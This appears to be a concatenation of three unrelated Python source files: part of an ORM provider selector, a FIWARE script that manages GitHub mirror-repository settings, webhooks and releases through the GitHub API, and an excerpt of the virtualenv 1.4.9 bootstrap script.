>>> provider = SAORMSelector.get_provider(User, session=session)
>>> str(provider.engine.url.drivername)
'sqlite'
"""
if entity is None and isinstance(hint, Engine):
engine = hint
if engine not in self._providers:
self._providers[engine] = SAORMProvider(hint, **hints)
return self._providers[engine]
if hint is None and entity is not None:
mapper = class_mapper(entity)
hint = mapper.tables[0].bind
engine = self._get_engine(hint, hints)
if engine not in self._providers:
if hint is None and len(hints) == 0:
hint = engine
self._providers[engine] = SAORMProvider(hint, **hints)
return self._providers[engine]
SAORMSelector = _SAORMSelector()
#MongoKitSelector = _MongoKitSelector()
MingSelector = _MingSelector()
#XXX:
#StormSelector = _StormSelector()
#SOSelector = _SOSelector()
class ProviderTypeSelectorError(Exception):pass
class ProviderTypeSelector(object):
def get_selector(self, entity=None, **hints):
#use a SA Helper
if hasattr(entity, '_sa_class_manager') and isinstance(entity._sa_class_manager, ClassManager):
return SAORMSelector
elif inspect.isclass(entity) and issubclass(entity, DummyEntity):
return SAORMSelector
#elif hasattr(entity, '_use_pylons') or hasattr(entity,'_enable_autoref'):
#xxx: find a better marker
# return MongoKitSelector
elif inspect.isclass(entity) and MappedClass is not None and issubclass(entity, MappedClass):
return MingSelector
#other helper definitions are going in here
else:
raise ProviderTypeSelectorError('Entity %s has no known provider mapping.'%entity)
|
<reponame>FIWARE-Ops/devops.Tools<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from argparse import ArgumentParser
from json import load, loads, dumps
from os import environ, path
from requests import get, post, patch, delete
url_description = 'https://api.github.com/repos/{}?access_token={}'
url_webhooks = 'https://api.github.com/repos/{}/hooks?access_token={}'
url_release = 'https://api.github.com/repos/{}/releases?page={}&token={}'
url_webhook = {'mirror': 'https://webhook.fiware.org/close-pull-request',
'transformer': 'https://webhook.fiware.org/transform'}
headers = {'Content-Type': 'application/json'}
description = "This is a mirror repo. Please fork from https://github.com/{}"
def create_webhook(target, webhook):
data = {'name': 'web',
'active': True,
'events': list(),
'config': {'insecure_ssl': 0,
'content_type': 'json'}
}
if webhook == 'mirror':
data['config']['url'] = url_webhook['mirror']
data['events'].append('pull_request')
else:
data['config']['url'] = url_webhook['transformer']
data['events'].append('push')
data = dumps(data)
url = url_webhooks.format(target, token)
resp = post(url, data=data, headers=headers)
if resp.status_code == 201:
return True
else:
return False
def change_parameters(source, target):
data = {'name': target.split('/')[1],
'description': description.format(source),
'has_issues': False,
'has_projects': False,
'has_wiki': False}
data = dumps(data)
resp = patch(url_description.format(repo['target'], token), data=data, headers=headers)
if resp.status_code == 200:
return True
return False
def delete_releases(target):
i = 0
releases = list()
while True:
resp = get(url_release.format(target, str(i), token))
if resp.status_code == 200:
data = loads(resp.text)
for el in data:
releases.append(el)
if 'next' not in resp:
break
i += 1
if len(releases) > 0:
for item in releases:
resp = delete(item['url'] + '?access_token=' + token)
if resp.status_code == 204:
print('Release deletion succeeded, ', item['url'])
else:
print('Release deletion failed, ', item['url'])
return True
def delete_webhooks(target):
resp = get(url_webhooks.format(target, token))
if resp.status_code == 200:
for item in loads(resp.text):
if 'config' in item:
if 'url' in item['config']:
if 'webhook.fiware.org' in item['config']['url']:
resp = delete(item['url'] + '?access_token=' + token)
if resp.status_code == 204:
print('Webhook deletion succeeded, ', item['url'], item['config']['url'])
else:
print('Webhook deletion failed, ', item['url'])
return True
if __name__ == '__main__':
if 'TOKEN' in environ:
token = environ['TOKEN']
else:
print('TOKEN not found')
token = None
exit(1)
parser = ArgumentParser()
parser.add_argument('--transformer', required=True, action='store')
parser.add_argument('--mirror', required=True, action='store')
parser.add_argument('--description', action='store_true')
parser.add_argument('--webhooks', action='store_true')
parser.add_argument('--delete_releases', action='store_true')
parser.add_argument('--delete_webhooks', action='store_true')
args = parser.parse_args()
if not path.isfile(args.mirror):
print('Config for mirror webhook not found')
exit(1)
if not path.isfile(args.transformer):
print('Config for transformer webhook not found')
exit(1)
config = dict()
try:
with open(args.mirror) as f:
config['mirror'] = load(f)
except ValueError:
print('Unsupported config type')
exit(1)
try:
with open(args.transformer) as f:
config['transformer'] = load(f)
except ValueError:
print('Unsupported config type')
exit(1)
if args.delete_releases:
print('Deleting releases')
for repo in config['mirror']['repositories']:
if not delete_releases(repo['target']):
print('releases: failed')
exit(1)
if args.delete_webhooks:
print('Deleting webhooks')
for repo in config['mirror']['repositories']:
if not delete_webhooks(repo['target']):
print('webhooks: failed')
exit(1)
if args.description:
print('Changing parameters')
for repo in config['mirror']['repositories']:
if not change_parameters(repo['source'], repo['target']):
print('desc: failed')
exit(1)
if not args.webhooks:
exit(0)
for webhook_type in ['mirror', 'transformer']:
print('Working on', webhook_type, 'webhook')
for repo in config[webhook_type]['repositories']:
hook = False
if webhook_type == 'mirror':
repo = repo['target']
else:
repo = repo['source']
response = get(url_webhooks.format(repo, token))
if response.status_code == 200:
for element in loads(response.text):
if 'config' in element:
if 'url' in element['config']:
if element['config']['url'] == url_webhook[webhook_type]:
hook = True
print('hook: exists')
if not hook:
print("repo:", repo)
if create_webhook(repo, webhook_type):
print('hook: added')
else:
print('hook: ERROR')
exit(1)
else:
print("repo:", repo['target'], " not found")
exit(1)
|
#!/usr/bin/env python
## WARNING: This file is generated
#!/usr/bin/env python
"""Create a "virtual" Python installation
"""
virtualenv_version = "1.4.9"
import sys
import os
import optparse
import re
import shutil
import logging
import distutils.sysconfig
try:
import subprocess
except ImportError, e:
if sys.version_info <= (2, 3):
print 'ERROR: %s' % e
print 'ERROR: this script requires Python 2.4 or greater; or at least the subprocess module.'
print 'If you copy subprocess.py from a newer version of Python this script will probably work'
sys.exit(101)
else:
raise
try:
set
except NameError:
from sets import Set as set
join = os.path.join
py_version = 'python%s.%s' % (sys.version_info[0], sys.version_info[1])
is_jython = sys.platform.startswith('java')
expected_exe = is_jython and 'jython' or 'python'
REQUIRED_MODULES = ['os', 'posix', 'posixpath', 'nt', 'ntpath', 'genericpath',
'fnmatch', 'locale', 'encodings', 'codecs',
'stat', 'UserDict', 'readline', 'copy_reg', 'types',
're', 'sre', 'sre_parse', 'sre_constants', 'sre_compile',
'lib-dynload', 'config', 'zlib']
if sys.version_info[:2] >= (2, 6):
REQUIRED_MODULES.extend(['warnings', 'linecache', '_abcoll', 'abc'])
if sys.version_info[:2] <= (2, 3):
REQUIRED_MODULES.extend(['sets', '__future__'])
class Logger(object):
"""
Logging object for use in command-line script. Allows ranges of
levels, to avoid some redundancy of displayed information.
"""
DEBUG = logging.DEBUG
INFO = logging.INFO
NOTIFY = (logging.INFO+logging.WARN)/2
WARN = WARNING = logging.WARN
ERROR = logging.ERROR
FATAL = logging.FATAL
LEVELS = [DEBUG, INFO, NOTIFY, WARN, ERROR, FATAL]
def __init__(self, consumers):
self.consumers = consumers
self.indent = 0
self.in_progress = None
self.in_progress_hanging = False
def debug(self, msg, *args, **kw):
self.log(self.DEBUG, msg, *args, **kw)
def info(self, msg, *args, **kw):
self.log(self.INFO, msg, *args, **kw)
def notify(self, msg, *args, **kw):
self.log(self.NOTIFY, msg, *args, **kw)
def warn(self, msg, *args, **kw):
self.log(self.WARN, msg, *args, **kw)
def error(self, msg, *args, **kw):
self.log(self.WARN, msg, *args, **kw)
def fatal(self, msg, *args, **kw):
self.log(self.FATAL, msg, *args, **kw)
def log(self, level, msg, *args, **kw):
if args:
if kw:
raise TypeError(
"You may give positional or keyword arguments, not both")
args = args or kw
rendered = None
for consumer_level, consumer in self.consumers:
if self.level_matches(level, consumer_level):
if (self.in_progress_hanging
and consumer in (sys.stdout, sys.stderr)):
self.in_progress_hanging = False
sys.stdout.write('\n')
sys.stdout.flush()
if rendered is None:
if args:
rendered = msg % args
else:
rendered = msg
rendered = ' '*self.indent + rendered
if hasattr(consumer, 'write'):
consumer.write(rendered+'\n')
else:
consumer(rendered)
def start_progress(self, msg):
assert not self.in_progress, (
"Tried to start_progress(%r) while in_progress %r"
% (msg, self.in_progress))
if self.level_matches(self.NOTIFY, self._stdout_level()):
sys.stdout.write(msg)
sys.stdout.flush()
self.in_progress_hanging = True
else:
self.in_progress_hanging = False
self.in_progress = msg
def end_progress(self, msg='done.'):
assert self.in_progress, (
"Tried to end_progress without start_progress")
if self.stdout_level_matches(self.NOTIFY):
if not self.in_progress_hanging:
# Some message has been printed out since start_progress
sys.stdout.write('...' + self.in_progress + msg + '\n')
sys.stdout.flush()
else:
sys.stdout.write(msg + '\n')
sys.stdout.flush()
self.in_progress = None
self.in_progress_hanging = False
def show_progress(self):
"""If we are in a progress scope, and no log messages have been
shown, write out another '.'"""
if self.in_progress_hanging:
sys.stdout.write('.')
sys.stdout.flush()
def stdout_level_matches(self, level):
"""Returns true if a message at this level will go to stdout"""
return self.level_matches(level, self._stdout_level())
def _stdout_level(self):
"""Returns the level that stdout runs at"""
for level, consumer in self.consumers:
if consumer is sys.stdout:
return level
return self.FATAL
def level_matches(self, level, consumer_level):
"""
>>> l = Logger()
>>> l.level_matches(3, 4)
False
>>> l.level_matches(3, 2)
True
>>> l.level_matches(slice(None, 3), 3)
False
>>> l.level_matches(slice(None, 3), 2)
True
>>> l.level_matches(slice(1, 3), 1)
True
>>> l.level_matches(slice(2, 3), 1)
False
"""
if isinstance(level, slice):
start, stop = level.start, level.stop
if start is not None and start > consumer_level:
return False
if stop is not None or stop <= consumer_level:
return False
return True
else:
return level >= consumer_level
#@classmethod
def level_for_integer(cls, level):
levels = cls.LEVELS
if level < 0:
return levels[0]
if level >= len(levels):
return levels[-1]
return levels[level]
level_for_integer = classmethod(level_for_integer)
def mkdir(path):
if not os.path.exists(path):
logger.info('Creating %s', path)
os.makedirs(path)
else:
logger.info('Directory %s already exists', path)
def copyfile(src, dest, symlink=True):
if not os.path.exists(src):
# Some bad symlink in the src
logger.warn('Cannot find file %s (bad symlink)', src)
return
if os.path.exists(dest):
logger.debug('File %s already exists', dest)
return
if not os.path.exists(os.path.dirname(dest)):
logger.info('Creating parent directories for %s' % os.path.dirname(dest))
os.makedirs(os.path.dirname(dest))
if symlink and hasattr(os, 'symlink'):
logger.info('Symlinking %s', dest)
os.symlink(os.path.abspath(src), dest)
else:
logger.info('Copying to %s', dest)
if os.path.isdir(src):
shutil.copytree(src, dest, True)
else:
shutil.copy2(src, dest)
def writefile(dest, content, overwrite=True):
if not os.path.exists(dest):
logger.info('Writing %s', dest)
f = open(dest, 'wb')
f.write(content)
f.close()
return
else:
f = open(dest, 'rb')
c = f.read()
f.close()
if c != content:
if not overwrite:
logger.notify('File %s exists with different content; not overwriting', dest)
return
logger.notify('Overwriting %s with new content', dest)
f = open(dest, 'wb')
f.write(content)
f.close()
else:
logger.info('Content %s already in place', dest)
def rmtree(dir):
if os.path.exists(dir):
logger.notify('Deleting tree %s', dir)
shutil.rmtree(dir)
else:
logger.info('Do not need to delete %s; already gone', dir)
def make_exe(fn):
if hasattr(os, 'chmod'):
oldmode = os.stat(fn).st_mode & 07777
newmode = (oldmode | 0555) & 07777
os.chmod(fn, newmode)
logger.info('Changed mode of %s to %s', fn, oct(newmode))
def _find_file(filename, dirs):
for dir in dirs:
if os.path.exists(join(dir, filename)):
return join(dir, filename)
return filename
def _install_req(py_executable, unzip=False, distribute=False):
if not distribute:
setup_fn = 'setuptools-0.6c11-py%s.egg' % sys.version[:3]
project_name = 'setuptools'
bootstrap_script = EZ_SETUP_PY
source = None
else:
setup_fn = None
source = 'distribute-0.6.8.tar.gz'
project_name = 'distribute'
bootstrap_script = DISTRIBUTE_SETUP_PY
try:
# check if the global Python has distribute installed or plain
# setuptools
import pkg_resources
if not hasattr(pkg_resources, '_distribute'):
location = os.path.dirname(pkg_resources.__file__)
logger.notify("A globally installed setuptools was found (in %s)" % location)
logger.notify("Use the --no-site-packages option to use distribute in "
"the virtualenv.")
except ImportError:
pass
search_dirs = file_search_dirs()
if setup_fn is not None:
setup_fn = _find_file(setup_fn, search_dirs)
if source is not None:
source = _find_file(source, search_dirs)
if is_jython and os._name == 'nt':
# Jython's .bat sys.executable can't handle a command line
# argument with newlines
import tempfile
fd, ez_setup = tempfile.mkstemp('.py')
os.write(fd, bootstrap_script)
os.close(fd)
cmd = [py_executable, ez_setup]
else:
cmd = [py_executable, '-c', bootstrap_script]
if unzip:
cmd.append('--always-unzip')
env = {}
if logger.stdout_level_matches(logger.DEBUG):
cmd.append('-v')
old_chdir = os.getcwd()
if setup_fn is not None and os.path.exists(setup_fn):
logger.info('Using existing %s egg: %s' % (project_name, setup_fn))
cmd.append(setup_fn)
if os.environ.get('PYTHONPATH'):
env['PYTHONPATH'] = setup_fn + os.path.pathsep + os.environ['PYTHONPATH']
else:
env['PYTHONPATH'] = setup_fn
else:
# the source is found, let's chdir
if source is not None and os.path.exists(source):
os.chdir(os.path.dirname(source))
else:
logger.info('No %s egg found; downloading' % project_name)
cmd.extend(['--always-copy', '-U', project_name])
logger.start_progress('Installing %s...' % project_name)
logger.indent += 2
cwd = None
if project_name == 'distribute':
env['DONT_PATCH_SETUPTOOLS'] = 'true'
def _filter_ez_setup(line):
return filter_ez_setup(line, project_name)
if not os.access(os.getcwd(), os.W_OK):
cwd = '/tmp'
if source is not None and os.path.exists(source):
# the current working dir is hostile, let's copy the
# tarball to /tmp
target = os.path.join(cwd, os.path.split(source)[-1])
shutil.copy(source, target)
try:
call_subprocess(cmd, show_stdout=False,
filter_stdout=_filter_ez_setup,
extra_env=env,
cwd=cwd)
finally:
logger.indent -= 2
logger.end_progress()
if os.getcwd() != old_chdir:
os.chdir(old_chdir)
if is_jython and os._name == 'nt':
os.remove(ez_setup)
def file_search_dirs():
here = os.path.dirname(os.path.abspath(__file__))
dirs = ['.', here,
join(here, 'virtualenv_support')]
if os.path.splitext(os.path.dirname(__file__))[0] != 'virtualenv':
# Probably some boot script; just in case virtualenv is installed...
try:
import virtualenv
except ImportError:
pass
else:
dirs.append(os.path.join(os.path.dirname(virtualenv.__file__), 'virtualenv_support'))
return [d for d in dirs if os.path.isdir(d)]
def install_setuptools(py_executable, unzip=False):
_install_req(py_executable, unzip)
def install_distribute(py_executable, unzip=False):
_install_req(py_executable, unzip, distribute=True)
_pip_re = re.compile(r'^pip-.*(zip|tar.gz|tar.bz2|tgz|tbz)$', re.I)
def install_pip(py_executable):
filenames = []
for dir in file_search_dirs():
filenames.extend([join(dir, fn) for fn in os.listdir(dir)
if _pip_re.search(fn)])
filenames.sort(key=lambda x: os.path.basename(x).lower())
if not filenames:
filename = 'pip'
else:
filename = filenames[-1]
easy_install_script = 'easy_install'
if sys.platform == 'win32':
easy_install_script = 'easy_install-script.py'
cmd = [py_executable, join(os.path.dirname(py_executable), easy_install_script), filename]
if filename == 'pip':
logger.info('Installing pip from network...')
else:
logger.info('Installing %s' % os.path.basename(filename))
logger.indent += 2
def _filter_setup(line):
return filter_ez_setup(line, 'pip')
try:
call_subprocess(cmd, show_stdout=False,
filter_stdout=_filter_setup)
finally:
logger.indent -= 2
def filter_ez_setup(line, project_name='setuptools'):
if not line.strip():
return Logger.DEBUG
if project_name == 'distribute':
for prefix in ('Extracting', 'Now working', 'Installing', 'Before',
'Scanning', 'Setuptools', 'Egg', 'Already',
'running', 'writing', 'reading', 'installing',
'creating', 'copying', 'byte-compiling', 'removing',
'Processing'):
if line.startswith(prefix):
return Logger.DEBUG
return Logger.DEBUG
for prefix in ['Reading ', 'Best match', 'Processing setuptools',
'Copying setuptools', 'Adding setuptools',
'Installing ', 'Installed ']:
if line.startswith(prefix):
return Logger.DEBUG
return Logger.INFO
def main():
parser = optparse.OptionParser(
version=virtualenv_version,
usage="%prog [OPTIONS] DEST_DIR")
parser.add_option(
'-v', '--verbose',
action='count',
dest='verbose',
default=0,
help="Increase verbosity")
parser.add_option(
'-q', '--quiet',
action='count',
dest='quiet',
default=0,
help='Decrease verbosity')
parser.add_option(
'-p', '--python',
dest='python',
metavar='PYTHON_EXE',
help='The Python interpreter to use, e.g., --python=python2.5 will use the python2.5 '
'interpreter to create the new environment. The default is the interpreter that '
'virtualenv was installed with (%s)' % sys.executable)
parser.add_option(
'--clear',
dest='clear',
action='store_true',
help="Clear out the non-root install and start from scratch")
parser.add_option(
'--no-site-packages',
dest='no_site_packages',
action='store_true',
help="Don't give access to the global site-packages dir to the "
"virtual environment")
parser.add_option(
'--unzip-setuptools',
dest='unzip_setuptools',
action='store_true',
help="Unzip Setuptools or Distribute when installing it")
parser.add_option(
'--relocatable',
dest='relocatable',
action='store_true',
help='Make an EXISTING virtualenv environment relocatable. '
'This fixes up scripts and makes all .pth files relative')
parser.add_option(
'--distribute',
dest='use_distribute',
action='store_true',
help='Use Distribute instead of Setuptools. Set environ variable'
'VIRTUALENV_USE_DISTRIBUTE to make it the default ')
if 'extend_parser' in globals():
extend_parser(parser)
options, args = parser.parse_args()
global logger
if 'adjust_options' in globals():
adjust_options(options, args)
verbosity = options.verbose - options.quiet
logger = Logger([(Logger.level_for_integer(2-verbosity), sys.stdout)])
if options.python and not os.environ.get('VIRTUALENV_INTERPRETER_RUNNING'):
env = os.environ.copy()
interpreter = resolve_interpreter(options.python)
if interpreter == sys.executable:
logger.warn('Already using interpreter %s' % interpreter)
else:
logger.notify('Running virtualenv with interpreter %s' % interpreter)
env['VIRTUALENV_INTERPRETER_RUNNING'] = 'true'
file = __file__
if file.endswith('.pyc'):
file = file[:-1]
os.execvpe(interpreter, [interpreter, file] + sys.argv[1:], env)
if not args:
print 'You must provide a DEST_DIR'
parser.print_help()
sys.exit(2)
if len(args) > 1:
print 'There must be only one argument: DEST_DIR (you gave %s)' % (
' '.join(args))
parser.print_help()
sys.exit(2)
home_dir = args[0]
if os.environ.get('WORKING_ENV'):
logger.fatal('ERROR: you cannot run virtualenv while in a workingenv')
logger.fatal('Please deactivate your workingenv, then re-run this script')
sys.exit(3)
if 'PYTHONHOME' in os.environ:
logger.warn('PYTHONHOME is set. You *must* activate the virtualenv before using it')
del os.environ['PYTHONHOME']
if options.relocatable:
make_environment_relocatable(home_dir)
return
create_environment(home_dir, site_packages=not options.no_site_packages, clear=options.clear,
unzip_setuptools=options.unzip_setuptools,
use_distribute=options.use_distribute)
if 'after_install' in globals():
after_install(options, home_dir)
def call_subprocess(cmd, show_stdout=True,
filter_stdout=None, cwd=None,
raise_on_returncode=True, extra_env=None):
cmd_parts = []
for part in cmd:
if len(part) > 40:
part = part[:30]+"..."+part[-5:]
if ' ' in part or '\n' in part or '"' in part or "'" in part:
part = '"%s"' % part.replace('"', '\\"')
cmd_parts.append(part)
cmd_desc = ' '.join(cmd_parts)
if show_stdout:
stdout = None
else:
stdout = subprocess.PIPE
logger.debug("Running command %s" % cmd_desc)
if extra_env:
env = os.environ.copy()
env.update(extra_env)
else:
env = None
try:
proc = subprocess.Popen(
cmd, stderr=subprocess.STDOUT, stdin=None, stdout=stdout,
cwd=cwd, env=env)
except Exception, e:
logger.fatal(
"Error %s while executing command %s" % (e, cmd_desc))
raise
all_output = []
if stdout is not None:
stdout = proc.stdout
while 1:
line = stdout.readline()
if not line:
break
line = line.rstrip()
all_output.append(line)
if filter_stdout:
level = filter_stdout(line)
if isinstance(level, tuple):
level, line = level
logger.log(level, line)
if not logger.stdout_level_matches(level):
logger.show_progress()
else:
logger.info(line)
else:
proc.communicate()
proc.wait()
if proc.returncode:
if raise_on_returncode:
if all_output:
logger.notify('Complete output from command %s:' % cmd_desc)
logger.notify('\n'.join(all_output) + '\n----------------------------------------')
raise OSError(
"Command %s failed with error code %s"
% (cmd_desc, proc.returncode))
else:
logger.warn(
"Command %s had error code %s"
% (cmd_desc, proc.returncode))
def create_environment(home_dir, site_packages=True, clear=False,
unzip_setuptools=False, use_distribute=False):
"""
Creates a new environment in ``home_dir``.
If ``site_packages`` is true (the default) then the global
``site-packages/`` directory will be on the path.
If ``clear`` is true (default False) then the environment will
first be cleared.
"""
home_dir, lib_dir, inc_dir, bin_dir = path_locations(home_dir)
py_executable = os.path.abspath(install_python(
home_dir, lib_dir, inc_dir, bin_dir,
site_packages=site_packages, clear=clear))
install_distutils(lib_dir, home_dir)
if use_distribute or os.environ.get('VIRTUALENV_USE_DISTRIBUTE'):
install_distribute(py_executable, unzip=unzip_setuptools)
else:
install_setuptools(py_executable, unzip=unzip_setuptools)
install_pip(py_executable)
install_activate(home_dir, bin_dir)
def path_locations(home_dir):
"""Return the path locations for the environment (where libraries are,
where scripts go, etc)"""
# XXX: We'd use distutils.sysconfig.get_python_inc/lib but its
# prefix arg is broken: http://bugs.python.org/issue3386
if sys.platform == 'win32':
# Windows has lots of problems with executables with spaces in
# the name; this function will remove them (using the ~1
# format):
mkdir(home_dir)
if ' ' in home_dir:
try:
import win32api
except ImportError:
print 'Error: the path "%s" has a space in it' % home_dir
print 'To handle these kinds of paths, the win32api module must be installed:'
print ' http://sourceforge.net/projects/pywin32/'
sys.exit(3)
home_dir = win32api.GetShortPathName(home_dir)
lib_dir = join(home_dir, 'Lib')
inc_dir = join(home_dir, 'Include')
bin_dir = join(home_dir, 'Scripts')
elif is_jython:
lib_dir = join(home_dir, 'Lib')
inc_dir = join(home_dir, 'Include')
bin_dir = join(home_dir, 'bin')
else:
lib_dir = join(home_dir, 'lib', py_version)
inc_dir = join(home_dir, 'include', py_version)
bin_dir = join(home_dir, 'bin')
return home_dir, lib_dir, inc_dir, bin_dir
def install_python(home_dir, lib_dir, inc_dir, bin_dir, site_packages, clear):
"""Install just the base environment, no distutils patches etc"""
if sys.executable.startswith(bin_dir):
print 'Please use the *system* python to run this script'
return
if clear:
rmtree(lib_dir)
## FIXME: why not delete it?
## Maybe it should delete everything with #!/path/to/venv/python in it
logger.notify('Not deleting %s', bin_dir)
if hasattr(sys, 'real_prefix'):
logger.notify('Using real prefix %r' % sys.real_prefix)
prefix = sys.real_prefix
else:
prefix = sys.prefix
mkdir(lib_dir)
fix_lib64(lib_dir)
stdlib_dirs = [os.path.dirname(os.__file__)]
if sys.platform == 'win32':
stdlib_dirs.append(join(os.path.dirname(stdlib_dirs[0]), 'DLLs'))
elif sys.platform == 'darwin':
stdlib_dirs.append(join(stdlib_dirs[0], 'site-packages'))
for stdlib_dir in stdlib_dirs:
if not os.path.isdir(stdlib_dir):
continue
if hasattr(os, 'symlink'):
logger.info('Symlinking Python bootstrap modules')
else:
logger.info('Copying Python bootstrap modules')
logger.indent += 2
try:
for fn in os.listdir(stdlib_dir):
if fn != 'site-packages' and os.path.splitext(fn)[0] in REQUIRED_MODULES:
copyfile(join(stdlib_dir, fn), join(lib_dir, fn))
finally:
logger.indent -= 2
mkdir(join(lib_dir, 'site-packages'))
writefile(join(lib_dir, 'site.py'), SITE_PY)
writefile(join(lib_dir, 'orig-prefix.txt'), prefix)
site_packages_filename = join(lib_dir, 'no-global-site-packages.txt')
if not site_packages:
writefile(site_packages_filename, '')
else:
if os.path.exists(site_packages_filename):
logger.info('Deleting %s' % site_packages_filename)
os.unlink(site_packages_filename)
stdinc_dir = join(prefix, 'include', py_version)
if os.path.exists(stdinc_dir):
copyfile(stdinc_dir, inc_dir)
else:
logger.debug('No include dir %s' % stdinc_dir)
if sys.exec_prefix != prefix:
if sys.platform == 'win32':
exec_dir = join(sys.exec_prefix, 'lib')
elif is_jython:
exec_dir = join(sys.exec_prefix, 'Lib')
else:
exec_dir = join(sys.exec_prefix, 'lib', py_version)
for fn in os.listdir(exec_dir):
copyfile(join(exec_dir, fn), join(lib_dir, fn))
if is_jython:
# Jython has either jython-dev.jar and javalib/ dir, or just
# jython.jar
for name in 'jython-dev.jar', 'javalib', 'jython.jar':
src = join(prefix, name)
if os.path.exists(src):
copyfile(src, join(home_dir, name))
# XXX: registry should always exist after Jython 2.5rc1
src = join(prefix, 'registry')
if os.path.exists(src):
copyfile(src, join(home_dir, 'registry'), symlink=False)
copyfile(join(prefix, 'cachedir'), join(home_dir, 'cachedir'),
symlink=False)
mkdir(bin_dir)
py_executable = join(bin_dir, os.path.basename(sys.executable))
if 'Python.framework' in prefix:
if re.search(r'/Python(?:-32|-64)*$', py_executable):
# The name of the python executable is not quite what
# we want, rename it.
py_executable = os.path.join(
os.path.dirname(py_executable), 'python')
logger.notify('New %s executable in %s', expected_exe, py_executable)
if sys.executable != py_executable:
## FIXME: could I just hard link?
executable = sys.executable
if sys.platform == 'cygwin' and os.path.exists(executable + '.exe'):
# Cygwin misreports sys.executable sometimes
executable += '.exe'
py_executable += '.exe'
logger.info('Executable actually exists in %s' % executable)
shutil.copyfile(executable, py_executable)
make_exe(py_executable)
if sys.platform == 'win32' or sys.platform == 'cygwin':
pythonw = os.path.join(os.path.dirname(sys.executable), 'pythonw.exe')
if os.path.exists(pythonw):
logger.info('Also created pythonw.exe')
shutil.copyfile(pythonw, os.path.join(os.path.dirname(py_executable), 'pythonw.exe'))
if os.path.splitext(os.path.basename(py_executable))[0] != expected_exe:
secondary_exe = os.path.join(os.path.dirname(py_executable),
expected_exe)
py_executable_ext = os.path.splitext(py_executable)[1]
if py_executable_ext == '.exe':
# python2.4 gives an extension of '.4' :P
secondary_exe += py_executable_ext
if os.path.exists(secondary_exe):
logger.warn('Not overwriting existing %s script %s (you must use %s)'
% (expected_exe, secondary_exe, py_executable))
else:
logger.notify('Also creating executable in %s' % secondary_exe)
shutil.copyfile(sys.executable, secondary_exe)
make_exe(secondary_exe)
if 'Python.framework' in prefix:
logger.debug('MacOSX Python framework detected')
# Make sure we use the the embedded interpreter inside
# the framework, even if sys.executable points to
# the stub executable in ${sys.prefix}/bin
# See http://groups.google.com/group/python-virtualenv/
# browse_thread/thread/17cab2f85da75951
shutil.copy(
os.path.join(
prefix, 'Resources/Python.app/Contents/MacOS/%s' % os.path.basename(sys.executable)),
py_executable)
# Copy the framework's dylib into the virtual
# environment
virtual_lib = os.path.join(home_dir, '.Python')
if os.path.exists(virtual_lib):
os.unlink(virtual_lib)
copyfile(
os.path.join(prefix, 'Python'),
virtual_lib)
# And then change the install_name of the copied python executable
try:
call_subprocess(
["install_name_tool", "-change",
os.path.join(prefix, 'Python'),
'@executable_path/../.Python',
py_executable])
except:
logger.fatal(
"Could not call install_name_tool -- you must have Apple's development tools installed")
raise
# Some tools depend on pythonX.Y being present
py_executable_version = '%s.%s' % (
sys.version_info[0], sys.version_info[1])
if not py_executable.endswith(py_executable_version):
# symlinking pythonX.Y > python
pth = py_executable + '%s.%s' % (
sys.version_info[0], sys.version_info[1])
if os.path.exists(pth):
os.unlink(pth)
os.symlink('python', pth)
else:
# reverse symlinking python -> pythonX.Y (with --python)
pth = join(bin_dir, 'python')
if os.path.exists(pth):
os.unlink(pth)
os.symlink(os.path.basename(py_executable), pth)
if sys.platform == 'win32' and ' ' in py_executable:
# There's a bug with subprocess on Windows when using a first
# argument that has a space in it. Instead we have to quote
# the value:
py_executable = '"%s"' % py_executable
cmd = [py_executable, '-c', 'import sys; print sys.prefix']
logger.info('Testing executable with %s %s "%s"' % tuple(cmd))
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE)
proc_stdout, proc_stderr = proc.communicate()
proc_stdout = os.path.normcase(os.path.abspath(proc_stdout.strip()))
if proc_stdout != os.path.normcase(os.path.abspath(home_dir)):
logger.fatal(
'ERROR: The executable %s is not functioning' % py_executable)
logger.fatal(
'ERROR: It thinks sys.prefix is %r (should be %r)'
% (proc_stdout, os.path.normcase(os.path.abspath(home_dir))))
logger.fatal(
'ERROR: virtualenv is not compatible with this system or executable')
if sys.platform == 'win32':
logger.fatal(
'Note: some Windows users have reported this error when they installed Python for "Only this user". The problem may be resolvable if you install Python "For all users". (See https://bugs.launchpad.net/virtualenv/+bug/352844)')
sys.exit(100)
else:
logger.info('Got sys.prefix result: %r' % proc_stdout)
pydistutils = os.path.expanduser('~/.pydistutils.cfg')
if os.path.exists(pydistutils):
logger.notify('Please make sure you remove any previous custom paths from '
'your %s file.' % pydistutils)
## FIXME: really this should be calculated earlier
return py_executable
def install_activate(home_dir, bin_dir):
if sys.platform == 'win32' or is_jython and os._name == 'nt':
files = {'activate.bat': ACTIVATE_BAT,
'deactivate.bat': DEACTIVATE_BAT}
if os.environ.get('OS') == 'Windows_NT' and os.environ.get('OSTYPE') == 'cygwin':
files['activate'] = ACTIVATE_SH
else:
files = {'activate': ACTIVATE_SH}
files['activate_this.py'] = ACTIVATE_THIS
for name, content in files.items():
content = content.replace('__VIRTUAL_ENV__', os.path.abspath(home_dir))
content = content.replace('__VIRTUAL_NAME__', os.path.basename(os.path.abspath(home_dir)))
content = content.replace('__BIN_NAME__', os.path.basename(bin_dir))
writefile(os.path.join(bin_dir, name), content)
def install_distutils(lib_dir, home_dir):
distutils_path = os.path.join(lib_dir, 'distutils')
mkdir(distutils_path)
## FIXME: maybe this prefix setting should only be put in place if
## there's a local distutils.cfg with a prefix setting?
home_dir = os.path.abspath(home_dir)
## FIXME: this is breaking things, removing for now:
#distutils_cfg = DISTUTILS_CFG + "\n[install]\nprefix=%s\n" % home_dir
writefile(os.path.join(distutils_path, '__init__.py'), DISTUTILS_INIT)
writefile(os.path.join(distutils_path, 'distutils.cfg'), DISTUTILS_CFG, overwrite=False)
def fix_lib64(lib_dir):
"""
Some platforms (particularly Gentoo on x64) put things in lib64/pythonX.Y
instead of lib/pythonX.Y. If this is such a platform we'll just create a
symlink so lib64 points to lib
"""
if [p for p in distutils.sysconfig.get_config_vars().values()
if isinstance(p, basestring) and 'lib64' in p]:
logger.debug('This system uses lib64; symlinking lib64 to lib')
assert os.path.basename(lib_dir) == 'python%s' % sys.version[:3], (
"Unexpected python lib dir: %r" % lib_dir)
lib_parent = os.path.dirname(lib_dir)
assert os.path.basename(lib_parent) == 'lib', (
"Unexpected parent dir: %r" % lib_parent)
copyfile(lib_parent, os.path.join(os.path.dirname(lib_parent), 'lib64'))
def resolve_interpreter(exe):
"""
If the executable given isn't an absolute path, search $PATH for the interpreter
"""
